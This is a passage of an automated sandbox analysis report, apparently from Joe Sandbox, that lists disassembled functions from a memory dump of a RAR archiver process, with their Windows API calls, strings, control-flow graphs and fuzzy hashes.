                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0E1E563A08A9295EB14EB25E884BFEABA5FF4574CF854431CE0D43385DF78E558C720
                                                                                                                                                                                                                                            Function 00007FF702C22574 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 1858 7ff702c22574-7ff702c2259c 1859 7ff702c2259e-7ff702c225a0 1858->1859 1860 7ff702c225a5-7ff702c225a9 1858->1860 1863 7ff702c2273a-7ff702c22756 1859->1863 1861 7ff702c225ba-7ff702c225c6 1860->1861 1862 7ff702c225ab-7ff702c225b6 GetStdHandle 1860->1862 1864 7ff702c225c8-7ff702c225cd 1861->1864 1865 7ff702c22619-7ff702c22637 WriteFile 1861->1865 1862->1861 1866 7ff702c225cf-7ff702c22609 WriteFile 1864->1866 1867 7ff702c22644-7ff702c22648 1864->1867 1868 7ff702c2263b-7ff702c2263e 1865->1868 1866->1867 1869 7ff702c2260b-7ff702c22615 1866->1869 1870 7ff702c22733-7ff702c22737 1867->1870 1871 7ff702c2264e-7ff702c22652 1867->1871 1868->1867 1868->1870 1869->1866 1872 7ff702c22617 1869->1872 1870->1863 1871->1870 1873 7ff702c22658-7ff702c22692 GetLastError call 7ff702c23144 SetLastError 1871->1873 1872->1868 1878 7ff702c226bc-7ff702c226d0 call 7ff702c1c95c 1873->1878 1879 7ff702c22694-7ff702c226a2 1873->1879 1885 7ff702c226d2-7ff702c226db 1878->1885 1886 7ff702c22721-7ff702c2272e call 7ff702c1cf14 1878->1886 1879->1878 1880 7ff702c226a4-7ff702c226ab 1879->1880 1880->1878 1882 7ff702c226ad-7ff702c226b7 call 7ff702c1cf34 1880->1882 1882->1878 1885->1861 1888 7ff702c226e1-7ff702c226e3 1885->1888 1886->1870 1888->1861 1889 7ff702c226e9-7ff702c2271c 1888->1889 1889->1861
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3350704910-0
                                                                                                                                                                                                                                            • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                            • Instruction ID: 4a6c3843d5166364996ccc495863609e6f71b8a47cbfaed3b603bbd69442f089
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7519327608641A6EB24EF25E81437BAB60FF45B80F940135EE5E46A90CFBCE546C711
                                                                                                                                                                                                                                            Function 00007FF702C16AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: swprintf
                                                                                                                                                                                                                                            • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                            • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                            • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                            • Instruction ID: 9edd5561ec3cfedb66ac1502abfe6a0e0c102b9863744bf10c7a9c51ec61eec5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6241AE23B08A42A1EB10FB21DC211BBABA4EF417A4F900136EA5E037D5EFBCD541C320
                                                                                                                                                                                                                                            Function 00007FF702C340A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SHGetMalloc.SHELL32(?,00000800,?,00007FF702C34432,?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C340C4
                                                                                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C340DF
                                                                                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32 ref: 00007FF702C340F1
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C23458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF702C3413F,?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C234A0
                                                                                                                                                                                                                                              • Part of subcall function 00007FF702C23458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF702C3413F,?,?,?,?,00000800,00000000,00000000,00007FF702C338CB,?,?,?,00007FF702C341EC), ref: 00007FF702C234D5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                                                                                                                                                                                                            • String ID: WinRAR
                                                                                                                                                                                                                                            • API String ID: 977838571-3970807970
                                                                                                                                                                                                                                            • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                            • Instruction ID: 1a63354004413515bdbb848dc945d388eca340ccf95e6ebcb2f1bd7b580fb6b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50216F17A0CA42A0EB54BF22EC501BBAB60AF99BD0B885031EF4E57759DFBCD444C760
                                                                                                                                                                                                                                            Function 00007FF702C21C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2244327787-0
                                                                                                                                                                                                                                            • Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                            • Instruction ID: e9f3a453a74b6e8c972f683b46bd2286a4cf148c16d8a355355acd6ea4314c23
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF219622E0C94691EB60AB15EC0033BEAA4FF45B94FA84131E95D4B6C6CFFDE449C761
                                                                                                                                                                                                                                            Function 00007FF702C149F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: AFUM$default.sfx
                                                                                                                                                                                                                                            • API String ID: 0-2491287583
                                                                                                                                                                                                                                            • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                            • Instruction ID: e655844d1d7cfbe9e346c11fb53dbae0cadf2c05bfd1e33f7a4806939d8d9a6d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D881B927B0CA9260EB78BB1199122BBAA91AF52794FC48031DA8D077C5DFED9485C770
                                                                                                                                                                                                                                            Function 00007FF702C665BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileHandleType
                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                            • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                            • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                            • Instruction ID: fb5102cffeca32d7d00e06bee89b9a411ecbcf1c2b4cbc71386a50ede2182bb6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A921D423A1C74250EB609B25AC9803AAE59EF45774F781335DA6F067D4CF7CE881C315
                                                                                                                                                                                                                                            Function 00007FF702C4B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                                                                                            • String ID: CreateThread failed
                                                                                                                                                                                                                                            • API String ID: 1217111108-3849766595
                                                                                                                                                                                                                                            • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                            • Instruction ID: c784816a1432ee258f346f3ebb447b0a22ed7c8ea57caf2e7a391b423457d760
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11113033A08A42A2E705FB14EC4117BBB61FF84798FD44132E65D02659EFBCE546C750
                                                                                                                                                                                                                                            Function 00007FF702C4BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3094578987-0
                                                                                                                                                                                                                                            • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                            • Instruction ID: ccffaad693fddec373cec6edcce536eacf59a3c801b9d948b7966c860140edc4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30F06223A08A4692DB60FF11E94007BA761FF89BD8F844131DE9D06669CFACD945CB10
                                                                                                                                                                                                                                            Function 00007FF702C62488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                            • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                            • Instruction ID: 801d93f86373deda1acdf74ddc0ff6f83b996a98bc78805ab8cc8e665f7a26e7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CE01A22B0870562EB44BB219C8937B6B526F84741F405438CC0E46392CFBDA408C361
                                                                                                                                                                                                                                            Function 00007FF702C17B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
